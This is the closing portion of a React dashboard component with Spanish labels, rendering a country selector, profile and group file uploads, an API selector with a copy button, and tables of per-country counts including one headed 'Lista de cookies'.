                                                            <option value='Sudan'>Sudan</option>
                                                            <option value='Sweden'>Sweden</option>
                                                            <option value='Singapore'>Singapore</option>
                                                            <option value='Saint Helena'>Saint Helena</option>
                                                            <option value='Slovenia'>Slovenia</option>
                                                            <option value='Svalbard and Jan Mayen'>Svalbard and Jan Mayen</option>
                                                            <option value='Slovakia'>Slovakia</option>
                                                            <option value='Sierra Leone'>Sierra Leone</option>
                                                            <option value='San Marino'>San Marino</option>
                                                            <option value='Senegal'>Senegal</option>
                                                            <option value='Somalia'>Somalia</option>
                                                            <option value='Suriname'>Suriname</option>
                                                            <option value='South Sudan'>South Sudan</option>
                                                            <option value='Sao Tome and Principe'>Sao Tome and Principe</option>
                                                            <option value='El Salvador'>El Salvador</option>
                                                            <option value='Sint Maarten'>Sint Maarten</option>
                                                            <option value='Syrian Arab Republic'>Syrian Arab Republic</option>
                                                            <option value='Swaziland'>Swaziland</option>
                                                            <option value='Turks and Caicos Islands'>Turks and Caicos Islands</option>
                                                            <option value='Chad'>Chad</option>
                                                            <option value='French Southern Territories'>French Southern Territories</option>
                                                            <option value='Togo'>Togo</option>
                                                            <option value='Thailand'>Thailand</option>
                                                            <option value='Tajikistan'>Tajikistan</option>
                                                            <option value='Tokelau'>Tokelau</option>
                                                            <option value='Timor-Leste'>Timor-Leste</option>
                                                            <option value='Turkmenistan'>Turkmenistan</option>
                                                            <option value='Tunisia'>Tunisia</option>
                                                            <option value='Tonga'>Tonga</option>
                                                            <option value='Turkey'>Turkey</option>
                                                            <option value='Trinidad and Tobago'>Trinidad and Tobago</option>
                                                            <option value='Tuvalu'>Tuvalu</option>
                                                            <option value='Taiwan'>Taiwan</option>
                                                            <option value='Tanzania :  United Republic of'>Tanzania : United Republic of</option>
                                                            <option value='Ukraine'>Ukraine</option>
                                                            <option value='Uganda'>Uganda</option>
                                                            <option value='United States Minor Outlying Islands'>
                                                                United States Minor Outlying Islands
                                                            </option>
                                                            <option value='United States'>United States</option>
                                                            <option value='Uruguay'>Uruguay</option>
                                                            <option value='Uzbekistan'>Uzbekistan</option>
                                                            <option value='Holy See (Vatican City State)'>Holy See (Vatican City State)</option>
                                                            <option value='Saint Vincent and the Grenadines'>Saint Vincent and the Grenadines</option>
                                                            <option value='Venezuela'>Venezuela</option>
                                                            <option value='Vietnam'>Vietnam</option>
                                                            <option value='Vanuatu'>Vanuatu</option>
                                                            <option value='Wallis and Futuna'>Wallis and Futuna</option>
                                                            <option value='Samoa'>Samoa</option>
                                                            <option value='Yemen'>Yemen</option>
                                                            <option value='Mayotte'>Mayotte</option>
                                                            <option value='South Africa'>South Africa</option>
                                                            <option value='Zambia'>Zambia</option>
                                                            <option value='Zimbabwe'>Zimbabwe</option>
                                                        </Input>
                                                    </div>
                                                </td>
                                                <td className='td-actions text-left'>
                                                    <p className='title'>Introduzca su contador</p>

                                                    <Input onChange={this.handlecontador.bind(this)} type='text'></Input>
                                                </td>

                                                <tr>
                                                    <td>
                                                        <p className='title'>Suba sus perfiles aqui</p>
                                                        <div>
                                                            <input type='file' onChange={(e) => this.showFile(e)} id='file' />
                                                        </div>
                                                        <p className='title'>Suba sus grupos aqui</p>
                                                        <div>
                                                            <input type='file' onChange={(e) => this.showFileGroup(e)} id='fileGroup' />
                                                        </div>
                                                        <div>
                                                            <p className='text-success'>{this.state.contacts}</p>
                                                        </div>
                                                    </td>
                                                    <td className='td-actions text-right'></td>
                                                </tr>
                                            </tbody>
                                        </Table>
                                    </div>
                                </CardBody>
                            </Card>
                            <Card>
                                <CardHeader>
                                    <CardTitle tag='h4'>API Generator</CardTitle>
                                </CardHeader>
                                <CardBody>
                                    <div className='table-full-width table-responsive'>
                                        <Table>
                                            <tbody>
                                                <td>
                                                    <p className='title'>Seleccione su API</p>
                                                    <UncontrolledDropdown>
                                                        <DropdownToggle caret color='info' className='animation-on-hover' data-toggle='dropdown'>
                                                            {this.state.Api}
                                                        </DropdownToggle>
                                                        <DropdownMenu className='dropdown-black'>
                                                            <DropdownItem onClick={this.handleApi.bind(this)}>Contactos</DropdownItem>
                                                            <DropdownItem onClick={this.handleApi.bind(this)}>Contactos Usados</DropdownItem>

                                                            <DropdownItem onClick={this.handleApi.bind(this)}>Enlaces</DropdownItem>
                                                        </DropdownMenu>
                                                    </UncontrolledDropdown>
                                                    <br />
                                                    <Button onClick={() => this.copyApi()} color='info' className='animation-on-hover'>
                                                        Copiar Api
                                                    </Button>
                                                </td>
                                                <td className='td-actions text-left'>
                                                    <p className='title'>Introduzca su cotorra</p>

                                                    <Input onChange={this.handlecotorra.bind(this)} type='text'></Input>
                                                </td>
                                            </tbody>
                                        </Table>
                                    </div>
                                </CardBody>
                            </Card>
                            <Card>
                                <CardHeader>
                                    <CardTitle tag='h4'>Lista de cookies</CardTitle>
                                </CardHeader>
                                <CardBody>
                                    <Table className='tablesorter' responsive>
                                        <thead className='text-primary'>
                                            <tr>
                                                <th>País</th>
                                                <th className='text-center'>Cantidad</th>
                                            </tr>
                                        </thead>
                                        <tbody>
                                            {this.state.countryDataCookie.map((country, index) => {
                                                return (
                                                    <tr key={index}>
                                                        <td>{country.country}</td>
                                                        <td className='text-center'>{country.cantidad}</td>
                                                    </tr>
                                                );
                                            })}
                                        </tbody>
                                    </Table>
                                </CardBody>
                            </Card>
                        </Col>

                        <Col lg='6' md='12'>
                            <Card>
                                <CardHeader>
                                    <CardTitle tag='h4'>Cantidad de hoy:{this.state.todaymount}</CardTitle>
                                    <CardTitle tag='h4'>Lista de paises</CardTitle>
                                </CardHeader>
                                <CardBody>
                                    <Table className='tablesorter' responsive>
                                        <thead className='text-primary'>
                                            <tr>
                                                <th>País</th>
                                                <th className='text-center'>Cantidad</th>
                                            </tr>
                                        </thead>
                                        <tbody>
                                            {this.state.countryData.map((country, index) => {
                                                return (
                                                    <tr key={index}>
                                                        <td>{country.country}</td>
                                                        <td className='text-center'>{country.cantidad}</td>
                                                    </tr>
                                                );
                                            })}
                                        </tbody>
                                    </Table>
                                </CardBody>
                            </Card>
                        </Col>
                    </Row>
                </div>
            </>
        );
    }
}

export default Dashboard;
